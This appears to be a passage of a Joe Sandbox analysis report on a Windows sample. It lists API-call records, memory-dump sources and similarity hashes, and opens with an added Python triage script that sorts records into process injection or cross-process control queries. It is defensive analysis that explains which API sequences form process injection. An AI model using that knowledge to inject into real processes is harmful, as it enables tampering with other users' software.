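Triage note on the record above, with an added example that is not Joe Sandbox code and not part of this report. The record pairs GetWindowThreadProcessId, OpenProcess with access 0x438 (PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION), VirtualAllocEx with 0x1000/0x4 (MEM_COMMIT, PAGE_READWRITE), WriteProcessMemory and ReadProcessMemory with SendMessageW messages 0x1104 (TVM_GETITEMRECT) and 0x1111 (TVM_HITTEST); the ReadProcessMemory argument list also carries 0x1073 (LVM_GETITEMTEXTW). Those common-control messages take an lParam pointer that must be valid in the process owning the control, so reading a tree view or list view in another process requires exactly this allocate/write/send/read sequence. The same primitives minus thread creation are also the first half of classic process injection, which is why injection heuristics fire on them; the distinguishing signals are the absence of CreateRemoteThread-style calls and the presence of the control messages. The script below, written for this example, parses the "APIs" bullets in the format this report uses and applies that rule; the message and access-mask names come from commctrl.h and winnt.h, the two embedded sample records are copied from this page, and the REMOTE_EXEC list and verdict thresholds are the example's own assumptions.

```python
"""Triage helper for the "APIs" bullets of a Joe Sandbox function record.

Added example, not Joe Sandbox code: it parses the record format shown on this
page and decides whether a record's remote-memory primitives look like process
injection or like a cross-process common-control query."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: the "APIs" bullets of the record whose SendMessageW calls are at 0056A3F7/0056A464/0056A4B1.
TREEVIEW_RECORD = """\
• Part of subcall function 00571CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E4E,?,?,00000034,00000800,?,00000034), ref: 00571CE5
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056A3F7
• Part of subcall function 00571C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00571CB0
• Part of subcall function 00571BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00571C08
• Part of subcall function 00571BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C18
• Part of subcall function 00571BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C2E
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A464
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A4B1
"""

# Constructed sample: the "APIs" bullets of the msctls_updown32 record (refs 0059826F-00598284).
UPDOWN_RECORD = """\
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0059826F
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0059827D
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00598284
"""

# One bullet: optional "Part of subcall function XXXX:", then API.MODULE(args), then "ref: XXXX".
# LIBCMT bullets have no argument list and no comma before "ref:", so both parts are optional.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Message IDs from commctrl.h (TV_FIRST = 0x1100, LVM_FIRST = 0x1000, UDM_* = WM_USER + n).
MESSAGE_NAMES = {0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST", 0x1073: "LVM_GETITEMTEXTW",
                 0x0465: "UDM_SETRANGE", 0x0469: "UDM_SETBUDDY"}
# Messages whose lParam is a pointer that must be valid in the process owning the control.
POINTER_MESSAGES = {0x1104, 0x1111, 0x1073}
REMOTE_MEMORY = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}
# Assumed list of execution primitives that turn remote memory access into injection.
REMOTE_EXEC = {"CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC", "SetThreadContext"}
PROCESS_ACCESS = {0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                  0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Union[int, str, None]]  # hex literal -> int, "?" -> None, other text kept as-is
    ref: int
    subcall: Optional[int]


def _arg(token: str) -> Union[int, str, None]:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # e.g. a window-class name such as msctls_updown32


def parse_record(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as "Strings", or a line in another format
        args = [_arg(a) for a in (m["args"] or "").split(",") if a.strip()]
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_access(mask: int) -> List[str]:
    """Expand an OpenProcess desired-access mask into the winnt.h flag names it contains."""
    return [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]


def triage(calls: List[Call]) -> dict:
    apis = {c.api for c in calls}
    messages = sorted({c.args[1] for c in calls
                       if c.api == "SendMessageW" and len(c.args) > 1 and isinstance(c.args[1], int)})
    remote_mem, remote_exec = apis & REMOTE_MEMORY, apis & REMOTE_EXEC
    if remote_exec:
        verdict = "remote-thread injection"
    elif {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"} <= remote_mem and POINTER_MESSAGES & set(messages):
        verdict = "cross-process common-control query"
    elif remote_mem:
        verdict = "cross-process memory access"
    else:
        verdict = "no remote-memory primitives"
    access = [decode_access(c.args[0]) for c in calls
              if c.api == "OpenProcess" and c.args and isinstance(c.args[0], int)]
    return {"verdict": verdict,
            "messages": [MESSAGE_NAMES.get(m, "0x%04X" % m) for m in messages],
            "remote_apis": sorted(remote_mem | remote_exec),
            "open_process_access": access}


if __name__ == "__main__":
    for name, record in (("treeview", TREEVIEW_RECORD), ("updown", UPDOWN_RECORD)):
        print(name, triage(parse_record(record)))
```

Run as-is it classifies the tree-view record as a cross-process common-control query and the up-down record as having no remote-memory primitives. Feeding it the "APIs" bullets of every record in a report gives a quick list of which functions deserve a look for injection and which are control helpers; a verdict of "cross-process memory access" without control messages is the case to examine by hand.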
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00597A86
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597A9A
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00597ABE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 10a635d87d38885199ed28e1b3328e897e0152ce43cfc00f1bbb7817a1963d8d
• Instruction ID: e0a06d9832b6c05ed23b0a8c66083aadc087093a291f38927b424f09c4c7f9a8
• Opcode Fuzzy Hash: 10a635d87d38885199ed28e1b3328e897e0152ce43cfc00f1bbb7817a1963d8d
• Instruction Fuzzy Hash: D121A03261021DBBDF118E50CC46FEE3FA9FB8C714F110115FE156B190D6B1A9549BA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0059826F
                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0059827D
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00598284
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                        • Opcode ID: 1d2ed38a8f67986f6a07ae22de6bd68b59c33c4ec384dc2ae4afb354c4598086
                                                                                                                                        • Instruction ID: 6f070096da2dfe3b4d10b9c9285ce4e72104bd72627e5157e9d4e715004216aa
                                                                                                                                        • Opcode Fuzzy Hash: 1d2ed38a8f67986f6a07ae22de6bd68b59c33c4ec384dc2ae4afb354c4598086
                                                                                                                                        • Instruction Fuzzy Hash: 63216DB5604209AFEF10DF54CC85DB73BEDFB5A354B140059F90197291DB70EC11DAA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00597360
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00597370
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00597395
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                        • String ID: Listbox
                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                        • Opcode ID: 0efcded8790d776bdfdca75222b4819622876bd1cae609d574515331ccf6f52d
                                                                                                                                        • Instruction ID: f42e503cc4f244cd3464eecb031d511c54d444ca1cdf9561bc2966643e6c2e33
                                                                                                                                        • Opcode Fuzzy Hash: 0efcded8790d776bdfdca75222b4819622876bd1cae609d574515331ccf6f52d
                                                                                                                                        • Instruction Fuzzy Hash: 5421B032624118BFEF118F54CC85EBF3FAAFB8D754F118525F9049B190C671AC519BA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597D97
                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597DAC
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597DB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        • Opcode ID: c062e5fd6d55742d4ca8c88d5e52402ac5e8137720908425b604f4116d2d9060
                                                                                                                                        • Instruction ID: ce2dbf984618489729ac40c8390cb8b022893b18dc2bc1ec6e5530332b469964
                                                                                                                                        • Opcode Fuzzy Hash: c062e5fd6d55742d4ca8c88d5e52402ac5e8137720908425b604f4116d2d9060
                                                                                                                                        • Instruction Fuzzy Hash: 7B11C172254209BAEF209F64CC05FEB3BA9FF89B14F114519FA41A6090D6719851DB20
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0054B544: _memset.LIBCMT ref: 0054B551
                                                                                                                                          • Part of subcall function 00530B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B520,?,?,?,0051100A), ref: 00530B79
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B524
                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B533
                                                                                                                                        Strings
                                                                                                                                        • =[, xrefs: 0054B514
                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B52E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=[
                                                                                                                                        • API String ID: 3158253471-134945641
                                                                                                                                        • Opcode ID: 88e61815b3feadbefd54233102c3a6bce02267f7d509b3f42d637027c35ae810
                                                                                                                                        • Instruction ID: a45316d881f84fe2511fc61066d12f8b434fe8295f13cee39b9e62fd26d59ab2
                                                                                                                                        • Opcode Fuzzy Hash: 88e61815b3feadbefd54233102c3a6bce02267f7d509b3f42d637027c35ae810
                                                                                                                                        • Instruction Fuzzy Hash: 1DE06D702007118FE7209F39E4087C6BFE0BF28748F00891EE486C2781EBB5E548DB92
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0055027A,?), ref: 0058C6E7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C6F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                                        • Opcode ID: a1ec9ca978c9a6f11f508deb53a28832113695fe71cadf0c9077676aacda3f9d
                                                                                                                                        • Instruction ID: 2cf221814ce1137db2ed32a29d4bfc6ce48641e13196516cbe10dde9f924bee5
                                                                                                                                        • Opcode Fuzzy Hash: a1ec9ca978c9a6f11f508deb53a28832113695fe71cadf0c9077676aacda3f9d
                                                                                                                                        • Instruction Fuzzy Hash: 9FE012795207128FEB206B25DC49F9A7ED8FF15755B50942DEC85E3290D770D840CF20
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00524B44,?,005249D4,?,?,005227AF,?,00000001), ref: 00524B85
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00524B97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-3689287502
                                                                                                                                        • Opcode ID: 5407d14c69099f71adb575b52361980e4e75709c38960ce76b5dbce0c59bdf2e
                                                                                                                                        • Instruction ID: 9513eafff95240e2dd240e2c6fd21b2ec08680f3b475e9ebb4df2e39a5e07c95
                                                                                                                                        • Opcode Fuzzy Hash: 5407d14c69099f71adb575b52361980e4e75709c38960ce76b5dbce0c59bdf2e
                                                                                                                                        • Instruction Fuzzy Hash: B3D017705207328FDB209F71EC58B4A7AE4BF1A391F11982ED486E25E0E674E880DE10
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00524AF7,?), ref: 00524BB8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00524BCA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                                        • Opcode ID: a9e77181252a12ec789b6effac66f3b426cc49a7d503cb82e443de4c31670ce1
                                                                                                                                        • Instruction ID: e8f53b772e76cc1c0f658515b7860a9c2908c900fbd2d3c2eef39d809d86fd62
                                                                                                                                        • Opcode Fuzzy Hash: a9e77181252a12ec789b6effac66f3b426cc49a7d503cb82e443de4c31670ce1
                                                                                                                                        • Instruction Fuzzy Hash: 1DD01774520722CFDB209F71EC48B4B7AE5BF16391B11AC6ED496D29E4EAB4D880CA10
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00591696), ref: 00591455
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00591467
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                        • Opcode ID: 49f5714696878cdb41ca996a7c3076cc327018532df3018d3bf1d64be650e600
                                                                                                                                        • Instruction ID: 3a8478a572a0b67ceae8a10e03e45a3565c90acc367b03890bc44d99ec8702bb
                                                                                                                                        • Opcode Fuzzy Hash: 49f5714696878cdb41ca996a7c3076cc327018532df3018d3bf1d64be650e600
                                                                                                                                        • Instruction Fuzzy Hash: 14D01734520B238FDF209FB5DC08B467EE4BF1A395B19C82ED4DAD21A0EA70D8C0CA14
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00525E3D), ref: 005255FE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00525610
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                        • Opcode ID: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                                                                                                                                        • Instruction ID: 25fea86732aebbb037d37f2c2669c7f75afe3b26a30e0252b8bf8663f525737b
                                                                                                                                        • Opcode Fuzzy Hash: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                                                                                                                                        • Instruction Fuzzy Hash: 3ED01774930B228FEB209F31EC0865B7AE4BF16395B11E82AD486D22E1E670D880CA50
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005893DE,?,005A0980), ref: 005897D8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005897EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-199464113
                                                                                                                                        • Opcode ID: b42207de46706df54c27b94890435697ea2f1554765e6452fea6535a41f282a9
                                                                                                                                        • Instruction ID: 74ac449d8cb2d457d0d409e722fd86300be716eec02519571e45dfd279231feb
                                                                                                                                        • Opcode Fuzzy Hash: b42207de46706df54c27b94890435697ea2f1554765e6452fea6535a41f282a9
                                                                                                                                        • Instruction Fuzzy Hash: EED012705207138FDB205F71DC896567AD4FF16391F15982DD885E2190DB70C880C711
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                                                                                                                                        • Instruction ID: 2d3e3c46dd71016531d7461730e16c65a4707b6f368f38addb224215c7e16c7a
                                                                                                                                        • Opcode Fuzzy Hash: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                                                                                                                                        • Instruction Fuzzy Hash: 51C16075A0021AEFCB14CFA4C888DAEFBB5FF48714B158998E805DB251DB31ED85DB90
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0058E7A7
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0058E7EA
                                                                                                                                          • Part of subcall function 0058DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DEAE
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E9EA
                                                                                                                                        • _memmove.LIBCMT ref: 0058E9FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                        • String ID:
